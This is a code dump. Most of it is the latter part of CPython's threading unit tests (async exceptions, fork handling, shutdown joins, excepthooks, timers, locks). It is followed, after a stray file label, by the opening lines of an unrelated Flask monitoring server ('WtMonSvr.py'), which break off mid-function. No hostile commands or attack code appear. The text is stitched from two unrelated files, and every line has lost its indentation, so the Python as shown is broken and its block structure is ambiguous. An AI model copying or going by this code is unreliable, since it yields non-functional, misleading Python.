# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'needs os.fork()')
def test_fork_at_exit(self):
# bpo-42350: Calling os.fork() after threading._shutdown() must
# not log an error.
code = textwrap.dedent("""
import atexit
import os
import sys
from test.support import wait_process
# Import the threading module to register its "at fork" callback
import threading
def exit_handler():
pid = os.fork()
if not pid:
print("child process ok", file=sys.stderr, flush=True)
# child process
else:
wait_process(pid, exitcode=0)
# exit_handler() will be called after threading._shutdown()
atexit.register(exit_handler)
""")
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err.rstrip(), b'child process ok')
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def func():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=func)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1 (func)\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
def test_gettrace(self):
def noop_trace(frame, event, arg):
# no operation
return noop_trace
old_trace = threading.gettrace()
try:
threading.settrace(noop_trace)
trace_func = threading.gettrace()
self.assertEqual(noop_trace,trace_func)
finally:
threading.settrace(old_trace)
def test_getprofile(self):
def fn(*args): pass
old_profile = threading.getprofile()
try:
threading.setprofile(fn)
self.assertEqual(fn, threading.getprofile())
finally:
threading.setprofile(old_profile)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
def test_boolean_target(self):
# bpo-41149: A thread that had a boolean value of False would not
# run, regardless of whether it was callable. The correct behaviour
# is for a thread to do nothing if its target is None, and to call
# the target otherwise.
class BooleanTarget(object):
def __init__(self):
self.ran = False
def __bool__(self):
return False
def __call__(self):
self.ran = True
target = BooleanTarget()
thread = threading.Thread(target=target)
thread.start()
thread.join()
self.assertTrue(target.ran)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
def test_original_excepthook(self):
def run_thread():
with support.captured_output("stderr") as output:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
return output.getvalue()
def threading_hook(args):
print("Running a thread failed", file=sys.stderr)
default_output = run_thread()
with support.swap_attr(threading, 'excepthook', threading_hook):
custom_hook_output = run_thread()
threading.excepthook = threading.__excepthook__
recovered_output = run_thread()
self.assertEqual(default_output, recovered_output)
self.assertNotEqual(default_output, custom_hook_output)
self.assertEqual(custom_hook_output, "Running a thread failed\n")
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
not_exported = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, not_exported=not_exported)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
WtMonSvr.py | from flask import Flask, session, redirect, request, make_response
from flask_compress import Compress
import json
import yaml
import datetime
import os
import hashlib
import sys
import chardet
import pytz
from .WtLogger import WtLogger
from .DataMgr import DataMgr, backup_file
from .PushSvr import PushServer
from .WatchDog import WatchDog, WatcherSink
from .WtBtMon import WtBtMon
from wtpy import WtDtServo
def pack_rsp(obj):
rsp = make_response(json.dumps(obj))
rsp.headers["content-type"]= "text/json;charset=utf-8"
return rsp
def parse_data():
try:
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
return True,json_data
except:
return False, {
"result": -998,
"message": "请求数据解析失败"
}
def get_param(json_data, key:str, type=str, defVal = ""):
if key not in json_data:
return defVal
else:
return type(json_data[key])
#获取文件最后N行的函数
def get_tail(filename, N:int = 100, encoding="GBK") :
filesize = os.path.getsize(filename)
